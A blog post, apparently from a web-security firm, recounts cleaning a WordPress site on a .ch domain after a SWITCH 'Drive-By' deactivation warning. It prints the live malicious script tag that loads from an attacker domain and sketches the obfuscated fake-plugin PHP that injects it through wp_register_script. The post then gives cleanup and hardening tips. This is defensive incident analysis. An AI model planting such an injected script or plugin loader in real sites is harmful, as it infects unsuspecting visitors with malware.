How to Remove “Drive-By” Malware & Fix a SWITCH Domain Deactivation Warning

Imagine opening your email on a Friday afternoon, only to find a terrifying message from your domain registrar, SWITCH:

“It has come to our attention that the website [your-domain].ch is being misused for Drive-By… If you have not yet cleaned your website by 17.11.2025 16:42, SWITCH will temporarily deactivate the domain name…”

This is the exact message one of our clients received. They had less than four hours to find and remove a “Drive-By” malware infection or their entire website would be taken offline.

This is the story of how we found the infection, cleaned the site, and saved the domain from deactivation—all before the deadline.

---

What is a “Drive-By” Warning?

First, let’s break down the warning.

• SWITCH: This is the official registrar for all .ch domains in Switzerland. A warning from them is the most serious alert a Swiss website owner can receive.
• “Drive-By” Misuse: This means the client’s website was hacked to infect its visitors. Simply visiting an infected page could be enough to download malware (like ransomware or spyware) onto a person’s computer without them clicking or downloading anything.

The warning email included a link to a saferinternet.ch status page, which confirmed the problem and provided the first clue.

(Suggested: Insert Screenshot 1, 2, or 3 here)

---

The Investigation: Finding the Malicious Code

The SaferInternet report gave us the “smoking gun”—a piece of malicious code that was being loaded on the client’s site:

hXXps://www.saferinternet.ch/en/domainstatus/?domain=[your-domain].ch

The report identified a specific “Malicious element”:

<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>

This single line of code was the “payload.” It secretly loaded a script from simplecopseholding.com, a domain owned by attackers. This script was responsible for the “Drive-By” infection.

Now we knew what the problem was. The next question was how it got there.

---

The Source: A “Fake Plugin” in Disguise

The malicious script wasn’t in the website’s theme, posts, or pages. After a full scan of the site’s files, we found the source of the infection: a fake, malicious plugin.

Hackers often hide malware inside files that look like legitimate plugins or themes. In this case, the plugin contained a PHP file with incredibly confusing and unreadable code. This is called obfuscation, and it’s designed to hide the malware from security scanners and developers.

The code was full of nonsense function names like coincidemajesticallywing() and likely_mealy_spirited_ice_cream() to make it hard to analyze.

<?php
function coincidemajesticallywing()
{
    // ...a huge block of unreadable, encoded text...
    $bestrideimpish = 'VkZod1ZtVkZOWEZhZWtrOQ==...';
    // ...more confusing code to decode the text...
    
    return $dearlyvery; // This variable holds the decoded malware URL
}

// ...several other random-looking, non-functional "junk" functions...

// AND HERE IS THE FINAL ATTACK:
wp_register_script('hexagoncontrail', coincidemajesticallywing(), array(), null, false);

Hidden at the very bottom was the line that did all the damage: wp_register_script().

This WordPress function is normally used to add helpful scripts (like for a slider or contact form). Here, the hackers used it to inject their malicious script on every single page of the website. The coincidemajesticallywing() function’s only purpose was to decode and return the malicious simplecopseholding.com URL.

---

The Solution: Clean-up and Prevention

With the source of the infection found, the fix was fast:

1. Removal: We immediately deleted the entire fake plugin and all its files.
2. Verification: We cleared the website’s cache (WP-Rocket, server-side, etc.) and re-scanned the site. The malicious <script> was gone.
3. Reporting: We used the saferinternet.ch portal to request a re-scan. The site passed, and the deactivation warning was lifted—well before the 4-hour deadline.

After the immediate threat was gone, we performed a full security “hardening” to prevent this from happening again:

• Updated all plugins, themes, and WordPress core.
• Changed all admin passwords.
• Installed a Web Application Firewall (WAF) to block future attacks.
• Scanned the entire site for any other “backdoors” the hackers might have left.

---

How to Protect Your Site from a “Drive-By” Hack

This was a high-stress situation, but it’s one you can avoid.

• Keep Everything Updated: This is the #1 way to stay safe. Hackers almost always get in through old, vulnerable plugins or themes.
• Use Strong Passwords: Use a password manager. Never use “admin” as a username.
• Never Use “Nulled” or Pirated Plugins: A “free” premium plugin from an unofficial site is the most common way to get this exact type of malware. This is very likely how the client’s site was infected in the first place.
• Install a Security Plugin: A good security plugin (like Wordfence or Sucuri) can scan your files and block many attacks before they happen.

Receiving a “domain deactivation” notice is one of the scariest emails you can get. But by acting quickly and methodically, we were able to find the needle in the haystack and get the client’s site clean and safe.

---

Have you ever received a warning like this? If you’re facing a website security issue and don’t know where to start, feel free to contact us for an emergency clean-up.